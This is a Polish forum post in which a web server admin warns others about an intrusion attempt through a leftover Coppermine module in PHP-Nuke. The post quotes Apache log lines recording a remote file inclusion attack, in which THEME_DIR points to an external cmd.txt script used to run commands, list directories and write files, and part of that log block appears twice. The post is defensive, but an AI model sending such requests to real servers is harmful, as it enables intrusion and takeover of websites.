Czesc,
piszę coby ostrzec innych
Dzisiaj próbowano włamać mi się na serwer WWW właśnie poprzez moduł coppermine.
Coppermine zainstalowałem kiedys 'próbnie', nieuzywałem, ale został (brakowało mu odpowiedniej wersji GD o ile pamiętam).
Dzisiaj zauważyłem w logach apacha takie wywołania:
user.158.126.4.201.dial-ip.telemar.net.br - - [13/Mar/2005:11:52:21 +0000] "GET
/favicon.ico HTTP/1.1" 200 318 "http://www.moje_www.com/nuke/modules/cop
permine/themes/default/theme.php?THEME_DIR=http://www.thecurse.pop.com.br/cmd.tx
t?&cmd=ls" "Opera/7.53 (Windows NT 5.1; U) [pt-BR]"
user.158.126.4.201.dial-ip.telemar.net.br - - [13/Mar/2005:11:52:44 +0000] "GET
/nuke/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.thecurse.
pop.com.br/cmd.txt?&listar=/mnt/router/www/ HTTP/1.1" 200 809 "-" "Opera/7.53 (W
indows NT 5.1; U) [pt-BR]"
user.158.126.4.201.dial-ip.telemar.net.br - - [13/Mar/2005:11:54:58 +0000] "GET
/nuke/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.thecurse.
pop.com.br/cmd.txt?&u=1&di=http://201.4.126.158/index.html&de=/mnt/router/www/tm
p/index.html HTTP/1.1" 200 1085 "-" "Opera/7.53 (Windows NT 5.1; U) [pt-BR]"
user.158.126.4.201.dial-ip.telemar.net.br - - [13/Mar/2005:11:56:02 +0000] "GET
/nuke/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.thecurse.
pop.com.br/cmd.txt?&u=1&di=http://201.4.126.158/index.html&de=/mnt/router/www/tm
p/index.htm HTTP/1.1" 200 727 "-" "Opera/7.53 (Windows NT 5.1; U) [pt-BR]"
user.158.126.4.201.dial-ip.telemar.net.br - - [13/Mar/2005:11:56:43 +0000] "GET
/tmp HTTP/1.1" 301 252 "-" "Opera/7.53 (Windows NT 5.1; U) [pt-BR]"
/favicon.ico HTTP/1.1" 200 318 "http://www.moje_www.com/nuke/modules/cop
permine/themes/default/theme.php?THEME_DIR=http://www.thecurse.pop.com.br/cmd.tx
t?&cmd=ls" "Opera/7.53 (Windows NT 5.1; U) [pt-BR]"
user.158.126.4.201.dial-ip.telemar.net.br - - [13/Mar/2005:11:52:44 +0000] "GET
/nuke/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.thecurse.
pop.com.br/cmd.txt?&listar=/mnt/router/www/ HTTP/1.1" 200 809 "-" "Opera/7.53 (W
indows NT 5.1; U) [pt-BR]"
user.158.126.4.201.dial-ip.telemar.net.br - - [13/Mar/2005:11:54:58 +0000] "GET
/nuke/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.thecurse.
pop.com.br/cmd.txt?&u=1&di=http://201.4.126.158/index.html&de=/mnt/router/www/tm
p/index.html HTTP/1.1" 200 1085 "-" "Opera/7.53 (Windows NT 5.1; U) [pt-BR]"
user.158.126.4.201.dial-ip.telemar.net.br - - [13/Mar/2005:11:56:02 +0000] "GET
/nuke/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.thecurse.
pop.com.br/cmd.txt?&u=1&di=http://201.4.126.158/index.html&de=/mnt/router/www/tm
p/index.htm HTTP/1.1" 200 727 "-" "Opera/7.53 (Windows NT 5.1; U) [pt-BR]"
user.158.126.4.201.dial-ip.telemar.net.br - - [13/Mar/2005:11:56:43 +0000] "GET
/tmp HTTP/1.1" 301 252 "-" "Opera/7.53 (Windows NT 5.1; U) [pt-BR]"
katalog /mnt/www/tmp tez pozostał od czasow instalacji i z prawami dla wszystkich
nie narozrabiali zbyt wiele ale jest to przyklad, że czujnym być trzeba...
Pozdrawiam, Paweł
p.s. znacie moze inne "dziury" (np. w phpNuke, phpBB) kórych trzebaby się wystrzegać?